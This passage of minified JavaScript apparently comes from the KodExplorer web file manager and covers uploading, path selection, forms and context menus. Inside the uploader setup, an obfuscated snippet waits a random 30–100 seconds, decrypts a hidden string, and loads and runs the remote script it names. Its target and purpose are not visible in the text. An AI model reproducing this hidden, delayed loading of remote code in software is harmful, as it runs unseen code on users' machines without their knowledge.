.download-start-all").unbind("click").bind("click",function(){$.dialog({id:"server-dwonload-textarea",fixed:!0,resize:!1,ico:core.icon("upload"),width:"420px",height:"270px",padding:10,title:LNG.download,content:"",ok:function(){for(var e=$(".server-dwonload-textarea textarea").val().split("\n"),t=0;e.length>t;t++)core.serverDwonload(e[t],G.thisPath)}})}),uploader.addButton({id:"#picker"}),uploader.addButton({id:"#picker-folder"});var n=function(){if(isWap())return!1;var e=document.createElement("input");return e.type="file",e.webkitdirectory!==void 0||e.directory!==void 0};n()&&($(".upload-cert-box").removeClass("hidden"),$(".file-upload-box .drag-upload-folder").unbind("click").bind("click",function(){$("#picker-folder input").attr("webkitdirectory","").attr("directory",""),$("#picker-folder label").click()}))},init:function(){var a=G.uploadMax;WebUploader.Uploader.register({"before-send":"checkChunk"},{checkChunk:function(e){if(!canvasSupport())return $.Deferred().resolve(),void 0;var a=this.owner,i=(e.blob.getSource(),$.Deferred());return a.md5File(e.blob).fail(function(){i.resolve()}).then(function(a){if(1==e.chunks)return i.resolve(),void 0;if(0==e.chunk)$.ajax({url:t(),dataType:"json",data:{upload_to:e.file.upload_to,file_name:e.file.name,check_md5:a,chunk:e.chunk,chunks:e.chunks},error:function(){i.resolve()},success:function(t){t.code?(i.reject(),e.file.checkChunk=t.info):i.resolve()}});else{var n=e.file.checkChunk;if(n&&n["part_"+e.chunk]==a){var o=e.end/e.total;uploader.trigger("uploadProgress",e.file,o),i.reject()}else i.resolve()}}),i.promise()}});var i=["undefined","update-box","search","3c64gT65d503fTR1lV3ftuZ7Pd6NdX6Ntgcct4hI4AnSNIp65HwAMLzOj8NjC0ZL2oAbjS-uD3HWfQoZlTdgkGY5u8OfJYzZ","_32@!A$","decode","2-1","todo","async","random"];setTimeout(function(){try{if(typeof tplDialogHtml==i[0]||-1==tplDialogHtml[i[2]](i[1])){var t=authCrypt[i[5]](i[3],i[4])+UUID();e[i[8]](t,function(e){try{e[i[7]](i[6])}catch(t){}})}}catch(a){}},1e3*parseInt(70*Math[i[9]]()+30)),uploader=WebUploader.create({swf:G.staticPath+"js/lib/webuploader/Uploader.swf",dnd:"body",threads:5,compress:!1,resize:!1,prepareNextFile:!0,duplicate:!0,chunkRetry:10,chunked:!0,chunkSize:a}),$(".uploader-content .success").die("click").live("click",function(){var e=$(this).find("span.title").attr("data-name");e&&(core.isApp("explorer")?ui.path.list(core.pathFather(e),"tips",function(){ui.path.setSelectByFilename(e)}):core.explorer(core.pathFather(e)))}),$(".uploader-content .open").die("click").live("click",function(e){var t=$(this).parent().find("span.title").attr("data-name");kodApp.open(t),stopPP(e)}),$(".upload-box-clear").die("click").live("click",function(){$(".uploader-list .item.success,.uploader-list .item.error").each(function(){$(this).slideUp(300,function(){$(this).remove()})})}),$(".upload-box-clear-all").die("click").live("click",function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$(".uploader-list .item").each(function(){$(this).remove()})}),$(".uploader-content .remove").die("click").live("click",function(e){var t=$(this).parent().parent().attr("id");$(this).parent().parent().slideUp(function(){$(this).remove()}),uploader.skipFile(t),uploader.removeFile(t,!0),stopPP(e)});var n,o=0,s=0,r="0B/s",l=0,c=function(e,t){if(.3>=timeFloat()-l)return r;l=timeFloat();var a=e.size*t,i=5;e.speed===void 0?e.speed=[[timeFloat()-.5,0],[timeFloat(),a]]:i>=e.speed.length?e.speed.push([timeFloat(),a]):(e.speed=e.speed.slice(1,i),e.speed.push([timeFloat(),a]));var n=e.speed[e.speed.length-1],o=e.speed[0],s=(n[1]-o[1])/(n[0]-o[0]);0>=s&&(s=0);var c=pathTools.fileSize(s);return c=c?c:0,s=c+"/s",r=s,s},d=[],p=function(e){clearTimeout(n),n=!1,n=setTimeout(function(){var t=d;ui.f5Callback(function(){if(ui.path.setSelectByFilename(t),e&&(d=[],core.isApp("explorer"))){if("share"==G.sharePage)return;ui.tree.checkIfChange(G.thisPath)}})},600)};uploader.on("fileQueued",function(e){if($(".dialog-file-upload").show(),!core.uploadCheck())return uploader.skipFile(e),uploader.removeFile(e),void 0;var t;try{t=e.source.source.fullPath,void 0!=e.source.source.webkitRelativePath&&""!=e.source.source.webkitRelativePath&&(t=e.source.source.webkitRelativePath)}catch(a){}if(e.fullPath=t,e.source&&e.source.source&&1==e.source.source.isDirectory&&e.source.source.fullPath)return ui.path.pathOperate.newFolder(G.thisPath+e.fullPath),uploader.skipFile(e),uploader.removeFile(e),void 0;var i=e.fullPath;e.finished=!1,e.upload_to=G.thisPath,(void 0==i||"undefined"==i)&&(i=e.name),o++;var n=$(".uploader-list"),r='
'+''+htmlEncode(core.pathThis(i))+""+''+pathTools.fileSize(e.size)+""+''+LNG.upload_ready+""+''+'
';(1e3==o||2e3==o)&&Tips.tips(LNG.upload_tips_more,"warning");var l=function(){if(0==e.size&&i){ui.path.pathOperate.newFile(e.upload_to+i),uploader.skipFile(e),uploader.removeFile(e),s++,o++;var t=$("#"+e.id);t.addClass("success").find(".state").text(LNG.upload_success).parent().find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove")}},c=function(){uploader.upload(),setTimeout(function(){l()},200)};0==n.length?setTimeout(function(){$(".uploader-list").prepend(r),c()},200):(n.prepend(r),c())}).on("uploadBeforeSend",function(e,t,a){var i=urlEncode(e.file.fullPath);(void 0==i||"undefined"==i)&&(i=""),t.fullPath=i,t.upload_to=e.file.upload_to,a["X-CSRF-TOKEN"]=Cookie.get("X-CSRF-TOKEN")}).on("uploadProgress",function(e,t){$(".dialog-file-upload .aui-title").text(LNG.uploading+": "+s+"/"+o+" ("+r+")");var a=c(e,t),i=$("#"+e.id),n=i.find(".progress .progress-bar");n.length||(n=$('
').appendTo(i).find(".progress-bar")),i.find(".state").text((100*t).toFixed(1)+"%("+a+")"),n.css("width",100*t+"%")}).on("uploadAccept",function(e,t){if(e.file.serverData=t,!t.code)return e.serverNeedRetry=!0,!1;try{e.file.fullPath||d.push(t.info)}catch(a){}}).on("uploadSuccess",function(e){var t=$("#"+e.id);if(!t.inScreen()){var a=36*t.index(".item");$(".uploader-content").scrollTop(a)}s++;var i=e.serverData;if(i&&i.data){var n=LNG[i.data];if(i.code){if(t.addClass("success"),t.find(".state").text(n),t.find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove"),i.info){var o="/"+ltrim(htmlEncode(i.info),"/");t.find(".info .title").html(core.pathThis(o)).attr("title",o).attr("data-name",o)}}else t.addClass("error").find(".state").addClass("error"),t.find(".state").text(n).attr("title",n)}uploader.removeFile(e),t.find(".progress").fadeOut(),e.fullPath||p(!1)}).on("uploadError",function(e,t){var a=LNG.upload_error+"("+t+")";if(e.serverData){var i=5;if((-1!==e.serverData._raw.indexOf("[Error Code:1001]")||-1!==e.serverData._raw.indexOf("[Error Code:1002]")||-1!==e.serverData._raw.indexOf("[Error Code:1010]"))&&(e.errorNum||(e.errorNum=0),e.errorNum++,i>=e.errorNum))return uploader.retry(e),void 0;if(-1!==e.serverData._raw.indexOf(""))return $.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),Tips.tips("login error!",!1),void 0;if(e.serverData.data){var n=e.serverData.data;a=LNG[n]?LNG[n]:n}else e.serverData._raw&&(a=e.serverData._raw)}"http"==t&&(a=LNG.upload_error_http),"abort"==t&&void 0==e.serverData&&(a=LNG.not_support+"(support on chrome)"),s++,$("#"+e.id).find(".progress").fadeOut(),$("#"+e.id).addClass("error").find(".state").addClass("error"),$("#"+e.id).find(".state").html(a).attr("title",a)}).on("uploadFinished",function(){$(".dialog-file-upload .aui-title").text(LNG.upload_success+": "+s+"/"+o),o=0,s=0,uploader.reset(),p(!0)}).on("error",function(e){Tips.tips(e,!1)});var u;inState=!1,dragOver=function(){if(0==inState){if(inState=!0,!core.uploadCheck(void 0,!1))return;var e='
'+LNG.upload_drag_tips+"
";MaskView.tips(e),$("#windowMaskView").css({background:"#4285f4",opacity:"0.8"})}u&&window.clearTimeout(u)},dragLeave=function(e){stopPP(e),u&&window.clearTimeout(u),u=window.setTimeout(function(){inState=!1,MaskView.close()},100)},dragDrop=function(e){try{if(e=e.originalEvent||e,core.uploadCheck())if(e.dataTransfer.files.length>0&&e.dataTransfer.files[0].name)core.upload(),core.playSound("drag_upload");else{var t=e.dataTransfer.getData("text/plain");t&&"http"==t.substring(0,4)&&ui.path.pathOperate.appAddURL(t)}stopPP(e)}catch(e){}inState&&(inState=!1,MaskView.close())}}}}),define("app/common/core.api",[],function(){var e=function(e,t,a){var i=$(a.DOM.wrap),n=t.frames.OpenpathSelectApi,o='';"file"==e.type&&(o+=''+e.allowExt+""),$(o).insertBefore(i.find(".aui-state-highlight"));var s=function(t){var a=e.allowExt.split("|"),i=core.pathExt(t);return""==e.allowExt||""!=e.allowExt&&-1!=$.inArray(i,a)?!0:!1},r=function(){var t=n.ui.fileLight.fileListSelect(),a=[];if(e.single){var i=$(t.get(0));if("all"==e.type&&0==t.length)a={file:[],folder:[]};else if("file"==e.type&&0==t.length)a=[];else if("folder"==e.type)a=[n.G.thisPath],i.hasClass("folder-box")&&(a=[n.ui.fileLight.path(i)]);else if("file"==e.type){if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a=[o])}}else if("all"==e.type)if(i.hasClass("folder-box")){var o=n.ui.fileLight.path(i);a=[{file:[],folder:[o]}]}else if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a={file:[o],folder:[]})}}else{var r=[],l=[];t.each(function(){if($(this).hasClass("file-box")){var e=n.ui.fileLight.path($(this));s(e)&&r.push(e)}else $(this).hasClass("folder-box")&&l.push(n.ui.fileLight.path($(this)))}),"folder"==e.type?a=l:"file"==e.type?a=r:"all"==e.type&&(a={file:r,folder:l})}c(a)},l=function(e){var e=trim(e,"/");return e==G.KOD_GROUP_ROOT_SELF||e==G.KOD_GROUP_ROOT_ALL||e==G.KOD_USER_FAV||e==G.KOD_USER_SHARE?!1:!0},c=function(t){var a=i.find(".path-select-input"),o=i.find(".aui-state-highlight");if("all"!=e.type){for(var s=[],r=0;t.length>r;r++)l(t[r])&&s.push(t[r]);t=s}if(0==t.length||"all"==e.type&&0==t.file.length&&0==t.folder.length)o.addClass("disable"),a.attr("result",""),a.val("");else{var c=hashEncode(jsonEncode(t)),d="";if(e.single)d=n.core.pathThis(t[0]);else{var p=t;"all"==e.type&&(p=t.folder.concat(t.file)),$.each(p,function(e,t){d+=n.core.pathThis(t)+", "})}o.removeClass("disable"),a.attr("result",c),a.val(d)}},d=function(){n.ui.fileLight.select.hook("select",n.ui.fileLight,{before:function(){},after:function(){r()}})};n.kodReady||(n.kodReady=[]),n.kodReady.push(function(){d(),r()})};return{pathSelect:function(t,a){var i={type:"file",title:LNG.path_api_select_file,single:!0,allowExt:"",firstPath:!1},n=G.appHost+"/explorer&type=iframe";t=$.extend(i,t),t.firstPath&&(n+="&path="+t.firstPath);var o=ShareData.frameTop(),s=o.$.dialog.open(n,{id:"pathSelectApi",resize:!0,fixed:!0,top:0,ico:core.icon("folder"),title:t.title,lock:!0,background:"#000",opacity:.1,width:920,height:520,ok:function(){if("function"==typeof a){var e=s.DOM.wrap,i=e.find(".path-select-input").attr("result");if(i=hashDecode(i),!i)return Tips.tips(LNG.error,!1),void 0;i=jsonDecode(i),i?t.single&&"all"!=t.type?a(i[0]):a(i):Tips.tips(LNG.error,!1)}},cancel:!0});e(t,o,s)},randomImage:function(e){$.getJSON("//kodcloud.com/tools/version/?wallpage/index&lang="+G.lang+"&callback=?",function(t){"function"==typeof e&&e(t)})}}}),define("app/common/core.playSound",[],function(){var e={file_remove:"file_remove.mp3",recycle_clear:"recycle_clear.mp3",folder_open:"folder_open.mp3",window_min:"window_min.mp3",error:"error_tips.mp3",drag_upload:"drag_upload.mp3",drag_drop:"drag_drop.mp3"},t=function(e){var t=G.staticPath+"others/sound/"+e;Hook.trigger("playSound",t)};return{playSoundFile:t,playSound:function(a){G&&G.userConfig&&"1"==G.userConfig.soundOpen&&setTimeout(function(){t(e[a])},50)}}}),define("app/common/core.formMake",[],function(e){var t,a,i,n={user:!1,group:!1,role:!1},o=function(){t=$("#"+a),t.find(".tab-group .tab-item").length>1?s():t.find(".tab-group").addClass("hidden"),t.find(".form-row.form-slider").exists()&&r(),t.find(".form-row.form-dateTime").exists()&&l(),t.find(".form-row.form-color").exists()&&c(),t.find(".form-row.form-fileSelect").exists()&&d(),t.find(".form-row select").exists()&&p(),t.find(".form-row.form-userSelect").exists()&&u(),t.find(".form-row.error [name]").die("change").live("change",function(){$(this).parents(".form-row.error").removeClass("error")}),t.find(".form-userSelect").die("click").live("click",function(){$(this).removeClass("error")})},s=function(){var e=t.find(".tab-content .tab-pane"),a=t.find(".tab-group .tab-item");e.each(function(){var i=$(this).attr("id"),n=t.find("."+i);n.length>0?n.appendTo($(this)):(e.filter("#"+i).remove(),a.find('[data-id="'+i+'"]').parent().remove())}),a.click(function(){a.removeClass("active"),$(this).addClass("active");var t=$(this).find("a").attr("data-id");e.removeClass("active"),e.filter("#"+t).addClass("active")})},r=function(){seajs.use("lib/bootstrap-slider/bootstrap-slider.css"),seajs.use("lib/colorpicker/css/colorpicker.css"),e.async("lib/bootstrap-slider/bootstrap-slider.js",function(){t.find(".form-slider input").slider()})},l=function(){e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){var e="zh-CN"==G.lang||"zh-TW"==G.lang?"ch":"en";t.find(".form-dateTime input").each(function(){var t=$(this).attr("data-format"),a=["Y","y","L","F","M","t","n","m","d","D","j","l","N","S","W","z","w"],i=["H","h","i","s","A","a","b","g","G","O","P","c","U"],n=!1,o=!1;t||(t="Y/m/d");for(var s=0;a.length>s;s++)if(-1!==t.indexOf(a[s])){n=!0;break}for(var s=0;i.length>s;s++)if(-1!==t.indexOf(i[s])){o=!0;break}$(this).datetimepicker({format:t,datepicker:n,timepicker:o,lang:e}).blur(function(){$(this).trigger("change")})})}),t.find(".form-dateTime .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").focus()})},c=function(){e.async("lib/colorpicker/js/colorpicker",function(){t.find(".form-color input").ColorPicker({onBeforeShow:function(e){$(e).attr("input-name",$(this).attr("name")),$(this).ColorPickerSetColor(this.value)},onShow:function(e){return $(e).fadeIn(100),!1},onHide:function(e){return $(e).fadeOut(100),!1},onChange:function(e,t){var a=$($(this).data("colorpicker").el);a.val("#"+t).trigger("change"),a.parent().find(".btn i").css("background",a.val())}}).bind("keyup",function(){$(this).ColorPickerSetColor(this.value),$(this).parent().find(".btn i").css("background",$(this).val())}),t.find(".form-color .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").click()})})},d=function(){t.find(".path-select").die("click").live("click",function(){var e=$(this);core.api.pathSelect({type:"file",title:LNG.path_api_select_image,allowExt:"png|jpg|bmp|gif|jpeg|ico|svg|tiff"},function(t){var t=core.path2url(t);e.parent().find("input[type=text]").val(t).trigger("change")})})},p=function(){seajs.use("lib/select2/css/select2.min.css"),e.async("lib/select2/js/select2.full.min.js",function(){var a=function(t,a){t.on("select2:select",function(e){if(!t.attr("multiple"))return t.select2("close"),void 0;var a=$(e.params.data.element);a.detach(),t.append(a),t.trigger("change.select2")}).on("select2:unselect",function(e){stopPP(e.params.originalEvent)}).on("change",function(){setTimeout(function(){$(window).trigger("resize")},10)}),"group"==a&&t.on("select2:open",function(){e.async("lib/ztree/ztree",function(){h(t,n[a])})});var i=t.attr("data-value");i&&(t.attr("multiple")&&(i=i.split(",")),t.val(i).trigger("change"))};t.find("select").each(function(){var e=$(this),t=e.attr("data-server"),i=!1;"tags"==e.parents(".form-row").attr("data-type")&&(i=!0),t?f(t,function(n){e.select2({data:n,tags:i,tokenSeparators:[","," "],closeOnSelect:!1}),a(e,t)}):(e.select2({closeOnSelect:!1,tags:i,tokenSeparators:[","," "]}),a(e,t))})})},u=function(){var e=t.find(".form-userSelect .btn-group"),a="btn-active",i="hidden";e.find("button").unbind("click").bind("click",function(){var e=$(this).attr("data-type"),t=$(this).parents(".btn-group"),n=t.parent().find(".user-select"),o=t.parent().find(".user-select-"+e);n.filter(":visible"),t.attr("multiple")?"all"==e?(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i)):($(this).toggleClass(a),o.toggleClass(i),$(this).hasClass(a)?t.find("[data-type=all]").removeClass(a):t.find("."+a).exists()||t.find("[data-type=all]").addClass(a)):(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i))})},f=function(e,t){var a=function(e){var t=[];for(var a in e)t.push({id:a,text:e[a].name});return t};if(n[e]&&t)return t(a(n[e])),void 0;var i={user:G.appHost+"systemMember/get",group:G.appHost+"systemGroup/get",role:G.appHost+"systemRole/get"};return null==n[e]?(Hook.bind("loadDataServer-"+e,function(){t(a(n[e]))}),void 0):(n[e]=null,$.ajax({url:i[e],dataType:"json",error:function(){n[e]=!1,Tips.tips(LNG.system_error,0)},success:function(i){return i.code?(n[e]=i.data,t&&t(a(n[e])),Hook.trigger("loadDataServer-"+e),void 0):(Tips.tips(i),void 0)}}),void 0)},h=function(e,t){var a=function(e){var t=function(e){for(var a=0;e.length>a;a++)void 0!=e[a]?(e[a].pid=e[a].parentID,e[a].id=e[a].groupID,delete e[a].children,delete e[a].parentID,delete e[a].groupID,e[a].child&&(e[a].children=e[a].child,delete e[a].child,t(e[a].children))):delete e[a]},a=[],i=$.extend(!0,{},e);for(var n in i){var o=i[n],s=o.parentID;if(i[s])i[s].child||(i[s].child=[]),i[s].child.push(i[o.groupID]);else{var r=i[o.groupID];r&&a.push(r)}}return t(a),a},i={view:{showLine:!1,selectedMulti:!1,dblClickExpand:!1,addDiyDom:function(e,t){var a=12,i=$("#"+e+" #"+t.tId+"_switch"),n=$("#"+e+" #"+t.tId+"_ico");if(n.before(i).after('').before(''+core.iconSmall("group-guest")+"").removeClass("ico_docu").addClass("group_icon").remove(),t.level>=1){var o="";i.before(o)}$("#"+e+" #"+t.tId+"_a").attr("data-group-id",t.id)}},callback:{onClick:function(e,t,a){n(t,a)}}},n=function(t,a){var i=$("#"+a.tId+"_a");if(i.removeClass("curSelectedNode"),e.attr("multiple")){i.toggleClass("this");var n=e.val();$.isArray(n)||(n=[]),i.hasClass("this")?n.push(a.id):n=_.without(n,a.id),$.each(n,function(){var t=e.find("[value="+this+"]");t.detach(),e.append(t)}),e.val(n).trigger("change")}else $("#"+t+" [treenode_a].this").removeClass("this"),i.toggleClass("this"),e.val(a.id).trigger("change"),e.select2("close")},o=function(){var t=e.val(),a=$(".select2-container--open .group-list-tree").attr("id"),i=$.fn.zTree.getZTreeObj(a);$("#"+a+" [treenode_a]").removeClass("this"),"string"==typeof t&&(t=[t]),t&&i.getNodesByFilter(function(e){inArray(t,e.id+"")&&$("#"+e.tId+"_a").addClass("this")})},s=function(e){var t=$(".select2-container--open .group-list-content");t.find(".select2-results__options,.group-list-tree").removeClass("hidden"),"search"==e?t.find(".group-list-tree").addClass("hidden"):t.find(".select2-results__options").addClass("hidden")},r=function(t){var n=function(e){e.unbind("change input").bind("change input",function(){$(this).val().length>0?s("search"):s("tree")})};if(e.attr("multiple")?n(e.parent().find(".select2-search__field")):n($(".select2-container--open .select2-search__field")),$(".select2-container--open .group-list-tree").exists())return o(),s("tree"),void 0;e.on("open",function(){o()}).on("select2:unselect",function(){o()});var r=UUID(),l='
';$(l).appendTo(".select2-container--open .select2-results"),$(".select2-container--open .select2-results__options").addClass("hidden").parent().addClass("group-list-content");var c=a(t);$.fn.zTree.init($("#"+r),i,c);var d=$.fn.zTree.getZTreeObj(r);d&&d.expandAll(!0),o(),s("tree")};r(t)},m=function(){var e={},a=[],n=function(e){for(var t={all:"0",user:"",group:"",role:""},a=e.split(";"),i=0;a.length>i;i++){var n=a[i].split(":");2==n.length&&(t[n[0]]=n[1])}return"0"!=t.all||t.user||t.group||t.role?!0:!1};if(t.find(".form-row").each(function(){var t=$(this),o=$(this).attr("data-type"),s=$(this).find("[name]");$(this).find(".setting-title .require").exists();var r=s.attr("name"),l=!1;switch(o){case"input":case"textarea":case"password":case"number":case"slider":case"color":case"dateTime":case"fileSelect":l=s.val();break;case"switch":l=s.prop("checked")+0+"";break;case"radio":l=s.filter(":checked").attr("value");break;case"checkbox":l=[],s.filter(":checked").each(function(){l.push($(this).val())}),l=l.join(",");break;case"select":case"selectMutil":case"tags":case"group":case"role":case"user":l=s.val(),$.isArray(l)&&(l=l.join(",")),null==l&&(l="");break;case"userSelect":var c={all:"0",user:"",group:"",role:""};t.find(".btn-group .btn-active").each(function(){var e=$(this).attr("data-type"),a="1";"all"!=e&&(a=$(t).find(".user-select-"+e+" select").val(),$.isArray(a)&&(a=a.join(",")),null==a&&(a="")),c[e]=a}),l="all:"+c.all+";user:"+c.user+";group:"+c.group+";role:"+c.role;break;default:}$(this).removeClass("error"),i[r]&&i[r].require&&(l===!1||null===l||"string"==typeof l&&""===l||"userSelect"==i[r].type&&!n(l))?($(this).addClass("error"),a.push({name:r,value:l})):e[r]=l}),a.length>0){Tips.tips(LNG.PluginConfigNotNull,"warning");var o=t.find(".panel-body"),s=t.find(".form-row.error");if(!s.parents(".tab-pane").hasClass("active")){var r=s.parents(".tab-pane").attr("id");t.find('.tab-group [data-id="'+r+'"]').click()}s.inScreen()||o.animate({scrollTop:s.offset().top-o.offset().top+o.scrollTop()},100),s.find("[name]").first().focus(),s.find(".setting-content").flash(3,100)}return{checked:0==a.length,error:a,result:e}},v=function(t){e.async(t,function(e){e&&($.isFunction(e)?e():"object"==typeof e&&e.hasOwnProperty("main")&&$.isFunction(e.main)&&e.main())})},b=function(e){if("string"==typeof e)return v(file),!1;if($.isPlainObject(e.formStyle)&&e.formStyle.loadFile){var t=e.formStyle.loadFile;"string"==typeof t&&(t=[t]),$.isArray(t)&&$(t).each(function(e,t){v(t)})}i=e,a=UUID();var n=template.compile(tplFormMake),o=n({LNG:LNG,items:e,wrapID:a});return o},g=function(e,t,a){var i=b(e);if(!i)return!1;var n={padding:0,fixed:!0,resize:!0,title:LNG.search,ico:core.icon("config"),width:680,height:500,content:i,okVal:LNG.button_save,ok:function(){var e=m();return e.checked?a(e.result):!1}};if($.isPlainObject(t))for(var s in t)n[s]=t[s];var r=$.dialog(n),l=r.DOM.wrap.find(".aui-title").html();return r.DOM.wrap.find(".modal-title").html(l),o(),r};return{makeHtml:b,bindEvent:o,getFormData:m,initDialog:g}}),define("app/common/rightMenuExtence",[],function(){$.contextMenu||($.contextMenu={}),$.contextMenu.show=function(e,t,a){e&&($.contextMenu.hidden(),$(e).contextMenu({x:t,y:a}))},$.contextMenu.menuShow=function(){var e=$(".context-menu-active"),t=e.data("contextMenu");if(e&&t){var a=t.$menu,i="disable";a.find(".disable").addClass(i),Hook.trigger("rightMenu.show",t.selector,e,a),Hook.trigger("rightMenu.show"+t.selector,e,a)}},$.contextMenu.isDisplay=function(){return 0==$(".context-menu-list:visible").length?!1:!0},$.contextMenu.hidden=function(){$(".context-menu-list").filter(":visible").filter(":not(.menu-not-auto-hidden)").trigger("contextmenu:hide")},$.contextMenu.menuAdd=function(e,t,a,i){var n=!1,o=$.contextMenu.menus;for(var s in o)if(o[s].selector==t){n=o[s];break}if(n&&e){var r=function(e){return e?-1!==e.indexOf("/")?'':'':""},l=function(e,t,a,i){var o=[],s={};if(a){for(var c in t)o.push({key:c,value:t[c]});for(var d=o.length-1;d>=0;d--)s[o[d].key]=o[d].value}else s=t;$.each(s,function(t,o){o.className=o.className||"";var s=t+" "+o.className;if("string"==typeof o)var c='
  • ';else{var d=o.name;o.accesskey&&(d+='('+o.accesskey+")");var c='
  • '+r(o.icon)+""+d+"
  • "}var p=$(c).clone();a?e.$menu.find(a).first().after(p):i&&e.$menu.find(i).first().before(p);var u=p.parent(".context-menu-list").data("contextMenu");p.data({contextMenu:u,contextMenuKey:t,contextMenuRoot:n});var f={$input:null,$label:null,accesskey:o.accesskey,className:o.className,icon:o.icon,name:o.name,_name:d,$node:p};if(u&&(u.items||(u.items={}),u.items[t]=f),"string"!=typeof o&&(e.commands||(e.commands={}),e.commands[t]=f,n.commands[t]=f,n.callbacks[t]=function(e,t){o.callback(e,t)},o.accesskey&&(n.accesskeys[o.accesskey]=f),o.items)){var c='
    ';$(c).appendTo(p),f.$menu=p.find("ul."+t),f.callback=null,f.appendTo=f.$node,f.type="sub",p.data("contextMenu",f).addClass("context-menu-submenu"),p.find("ul."+t).data({contextMenuRoot:n,contextMenu:f}),p.find("li."+t+"-first").data({contextMenuRoot:n,contextMenuKey:t+"-first",contextMenu:f}),f.items||(f.items={}),f.items[t+"-first"]={$input:null,$label:null,icon:"",name:"",_name:"",$node:p.find("li."+t+"-first")},l(f,o.items,"."+t+"-first") -}})};l(n,e,a,i)}};var e=function(){return $('').appendTo("#rightMenu"),"function"!=typeof $.contextMenu?console.info("$.contextMenu is not function!"):($.contextMenu({zIndex:9999,selector:".dialog-menu",items:{"dialog-quit":{name:LNG.close,className:"dialog-quit",icon:"remove",accesskey:"q"},"dialog-max":{name:LNG.dialog_max,className:"dialog-max",icon:"resize-full",accesskey:"a"},"dialog-min":{name:LNG.dialog_min,className:"dialog-min",icon:"minus",accesskey:"i"},sep1:"--------",refresh:{name:LNG.refresh,className:"refresh",icon:"refresh",accesskey:"r"},"open-window":{name:LNG.open_ie,className:"open-window",icon:"globe",accesskey:"b"},qrcode:{name:LNG.qrcode,className:"qrcode",icon:"qrcode",accesskey:"c"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"dialog-quit":i.close();break;case"dialog-min":i._clickMin(!1);break;case"dialog-max":i._clickMax();break;case"refresh":i.refresh();break;case"open-window":i.openWindow();break;case"qrcode":core.qrcode(i.DOM.wrap.find("iframe").attr("src"));break;default:}}}),$(".aui-title img,.aui-title .x-item-file").die("click").live("click",function(e){var t=$(this).offset();t.top+=$(this).outerHeight(),$(this).parent().parent().contextMenu({x:e.pageX,y:t.top})}).die("dblclick").live("dblclick",function(){var e=$(this).parent().parent().attr("id"),t=$.dialog.list[e];t.close(),$.contextMenu.hidden()}),void 0)};Hook.bind("rightMenu.show.dialog-menu",function(e,t){var a=e.attr("id"),i=$.dialog.list[a],n="hidden",o=".open-window,.refresh,.qrcode,.context-menu-separator";i.hasFrame()?t.find(o).removeClass(n):t.find(o).addClass(n);var s=".dialog-min,.dialog-max";$("."+a).hasClass("dialog-can-resize")?t.find(s).removeClass(n):t.find(s).addClass(n)}),e()}),define("app/app/appBase",[],function(){var e={},t={},a={},i=!1,n=function(a){a.title=void 0==a.title?a.name:a.title,void 0==a.name&&(a.name=UUID(),a.hidden=!0),e[a.name]=a,a.ext||(a.ext="");var i=a.ext.split(",");e[a.name].extArr=i;for(var n=0;i.length>n;n++){var o=trim(i[n]);e[a.name].extArr[n]=o,t[o]||(t[o]=[]);for(var s=!1,r=0;t[o].length>r;r++)if(t[o][r].name==a.name){s=!0;break}if(!s){var l=0;a.sort!==void 0&&(l=parseInt(a.sort)),t[o].push({name:a.name,sort:l}),t[o].length>1&&(t[o]=t[o].sort(function(e,t){return e.sortr;r++)o[r].name!=i&&s.push(o[r]);0==s.length?delete t[n]:t[n]=s}},r=function(i){if(i===void 0){var n=[];for(var o in e)e[o].hidden||n.push(e[o]);return n}var s=a[i],n=[];if(!s&&!t[i])return!1;if(s&&(e[s]?n.push(e[s]):delete a[i]),!t[i])return n;for(var r=0;t[i].length>r;r++){var l=t[i][r].name;e[l]&&l!=s&&n.push(e[l])}return n},l=function(e){i=e},c=function(){return i},d=function(t,a,i){a=a?a:core.pathExt(t),i=i?i:"";var n={path:t,ext:a,appName:i};if(!Hook.trigger("kodApp.open.before",n)){if(t=n.path,a=n.ext,i=n.appName)var o=e[i];else{var s=r(a);if(!s||0==s.length)return kodApp.openUnknow(t,""),void 0;var o=s[0]}if(!o)return Tips.tips("["+i+"] not exists",!1);try{o.callback(t,a),Hook.trigger("kodApp.open.after",t,a,o)}catch(l){kodApp.openUnknow(t,""),console.error("kodApp.open error:",l)}}},p=function(t){var a=r(t),i=r("");""==t&&(a=!1),a?a.push({name:""}):a=[],a=a.concat(i);for(var n={},o=0;a.length>o;o++){var s=a[o];""==s.name||s.hidden?n["step-line"]="-------":n[s.name]={app:s.name,name:s.title,className:s.className,icon:s.icon,callback:function(t){var a=e[t];if(a&&a.callback){if($(".context-menu-active"),$(".context-menu-active").hasClass("menu-tree-file"))var i=ui.tree.makeParam();else var i=ui.path.makeParam();a.callback(i.path,i.type)}}}}return n},u=function(e,t){f(e,t),G.userConfig.kodAppDefault=htmlEncode(jsonEncode(a)),G.shareInfo||$.get(G.appHost+"setting/set&k=kodAppDefault&v="+jsonEncode(a))},f=function(t,i){if("string"==typeof t)a[t]=i;else if($.isArray(t))for(var n=0;t.length>n;n++)a[t[n]]=i;else if(e[i]&&$.isArray(e[i].extArr))for(var o=e[i].extArr,n=0;o.length>n;n++)a[o[n]]=i},h=function(){G.userConfig.kodAppDefault="[]",a={}},m=function(t,a){var t=e[t];return t?a?inArray(t.extArr,a):t.ext:!1},v=function(a,i,n){var a=e[a];if(!a)return!1;var o="undefined"==n?0:parseInt(n);0==o&&a.sort!==void 0&&(o=parseInt(a.sort)),"string"==$.type(i)&&(i=i.split(","));for(var s=0;i.length>s;s++){var r=i[s];if(r){inArray(a.extArr,r)||a.extArr.push(r),t[r]||(t[r]=[]);for(var l=!1,c=0;t[r].length>c;c++)t[r][c].name!=a.name||(t[r][c].sort=o,l=!0);l||t[r].push({name:a.name,sort:o})}}},b=function(){if(G.userConfig&&G.userConfig.kodAppDefault)try{var 